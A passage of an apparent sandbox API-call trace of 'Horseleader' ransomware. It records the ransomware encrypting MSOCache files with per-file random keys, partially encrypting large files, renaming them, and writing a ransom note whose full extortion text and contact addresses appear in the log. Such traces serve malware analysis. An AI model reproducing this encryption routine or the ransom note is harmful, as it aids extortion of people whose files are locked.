Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".testttjffg") returned 0x0 [0161.485] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0161.485] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0161.485] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0161.487] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0161.488] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0161.488] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=4207) returned 1 [0161.488] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, 
lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x106f, lpOverlapped=0x0) returned 1 [0161.490] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffef91, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0161.490] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x106f, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x106f, lpOverlapped=0x0) returned 1 [0161.491] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.491] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0161.491] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0161.491] CloseHandle (hObject=0x21c) returned 1 [0161.496] GetProcessHeap () returned 0x780000 [0161.496] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7b3178 [0161.496] wnsprintfW (in: pszDest=0x7b3178, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader") returned 88 [0161.496] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.horseleader")) 
returned 1 [0161.497] GetProcessHeap () returned 0x780000 [0161.497] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7b3178 | out: hHeap=0x780000) returned 1 [0161.497] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf00db300, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x106f, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0161.497] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0161.497] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt") returned 80 [0161.497] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0161.498] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0161.498] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0161.500] lstrlenA (lpString="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") returned 1368 [0161.500] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0161.500] CloseHandle (hObject=0x1cc) returned 1 [0161.500] GetProcessHeap () returned 0x780000 [0161.500] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a620 | out: hHeap=0x780000) returned 1 [0161.500] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="{90140000-001B-0409-1000-0000000FF1CE}-C", cAlternateFileName="{94E50~1")) returned 1 [0161.501] lstrcmpiW (lpString1="{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0161.501] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C") returned 66 [0161.501] lstrcmpW (lpString1="{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0161.501] lstrcmpW (lpString1="{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0161.501] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C", 
lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0161.501] GetProcessHeap () returned 0x780000 [0161.501] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79a620 [0161.501] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*") returned 68 [0161.501] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0161.503] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0161.503] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\.") returned 68 [0161.503] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0161.503] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0161.503] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") returned 1 [0161.503] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0161.503] lstrlenW (lpString=".testttjffg") returned 11 [0161.503] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\.", lpSrch=".testttjffg") returned 0x0 [0161.503] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0161.503] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, 
pdwDataLen=0x32af044*=0x80) returned 1 [0161.503] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.504] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0161.504] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0161.504] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\..") returned 69 [0161.504] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0161.504] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0161.504] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0161.504] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0161.504] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0161.504] lstrlenW (lpString=".testttjffg") returned 11 [0161.504] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\..", lpSrch=".testttjffg") returned 0x0 [0161.504] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0161.504] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: 
pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0161.504] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.505] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x978, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0161.505] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0161.505] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0161.505] StrStrIW (lpFirst="Setup.xml", lpSrch=".horseleader") returned 0x0 [0161.505] lstrcmpW (lpString1="Setup.xml", lpString2="#Decrypt#.txt") returned 1 [0161.505] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0161.505] lstrlenW (lpString=".testttjffg") returned 11 [0161.505] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".testttjffg") returned 0x0 [0161.505] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0161.505] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0161.505] CreateFileW 
(lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0161.506] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0161.506] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0161.506] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=2424) returned 1 [0161.506] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x978, lpOverlapped=0x0) returned 1 [0161.517] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffff688, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0161.518] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x978, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x978, lpOverlapped=0x0) returned 1 [0161.518] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.518] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0161.518] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0161.518] CloseHandle (hObject=0x21c) returned 1 [0161.523] GetProcessHeap () returned 
0x780000 [0161.523] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7b3178 [0161.524] wnsprintfW (in: pszDest=0x7b3178, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader") returned 88 [0161.524] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.horseleader")) returned 1 [0161.535] GetProcessHeap () returned 0x780000 [0161.535] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7b3178 | out: hHeap=0x780000) returned 1 [0161.535] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2fb48f00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x2fb48f00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc967850, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x29c6dbd, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="WordLR.cab", cAlternateFileName="")) returned 1 [0161.535] lstrcmpiW (lpString1="WordLR.cab", lpString2="Windows") returned 1 [0161.535] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 77 [0161.535] StrStrIW (lpFirst="WordLR.cab", lpSrch=".horseleader") returned 0x0 [0161.535] lstrcmpW (lpString1="WordLR.cab", lpString2="#Decrypt#.txt") returned 1 [0161.535] lstrcmpW (lpString1="WordLR.cab", lpString2="_uninstalling_.png") returned 1 [0161.535] lstrlenW (lpString=".testttjffg") 
returned 11 [0161.535] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab", lpSrch=".testttjffg") returned 0x0 [0161.535] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0161.535] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0161.536] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0161.536] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab") returned 77 [0161.536] StrStrW (lpFirst="WordLR.cab", lpSrch=".txt") returned 0x0 [0161.536] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=43806141) returned 1 [0161.536] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.536] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0161.542] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0161.542] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0161.544] SetFilePointerEx (in: 
hFile=0x21c, liDistanceToMove=0x14e0ede, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.545] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0161.548] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0161.548] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0161.548] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x29c1dbd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.548] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0161.551] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0161.551] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0161.551] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.551] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0161.551] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, 
nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0161.552] CloseHandle (hObject=0x21c) returned 1 [0165.764] GetProcessHeap () returned 0x780000 [0165.764] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7b3178 [0165.764] wnsprintfW (in: pszDest=0x7b3178, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.horseleader") returned 89 [0165.764] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab.horseleader")) returned 1 [0165.767] GetProcessHeap () returned 0x780000 [0165.767] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7b3178 | out: hHeap=0x780000) returned 1 [0165.767] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfc8a9170, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x267e00, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="WordMUI.msi", cAlternateFileName="")) returned 1 [0165.767] lstrcmpiW (lpString1="WordMUI.msi", lpString2="Windows") returned 1 [0165.768] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 78 [0165.768] StrStrIW 
(lpFirst="WordMUI.msi", lpSrch=".horseleader") returned 0x0 [0165.768] lstrcmpW (lpString1="WordMUI.msi", lpString2="#Decrypt#.txt") returned 1 [0165.768] lstrcmpW (lpString1="WordMUI.msi", lpString2="_uninstalling_.png") returned 1 [0165.768] lstrlenW (lpString=".testttjffg") returned 11 [0165.768] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi", lpSrch=".testttjffg") returned 0x0 [0165.768] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0165.768] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0165.769] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0165.769] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 78 [0165.769] StrStrW (lpFirst="WordMUI.msi", lpSrch=".txt") returned 0x0 [0165.769] 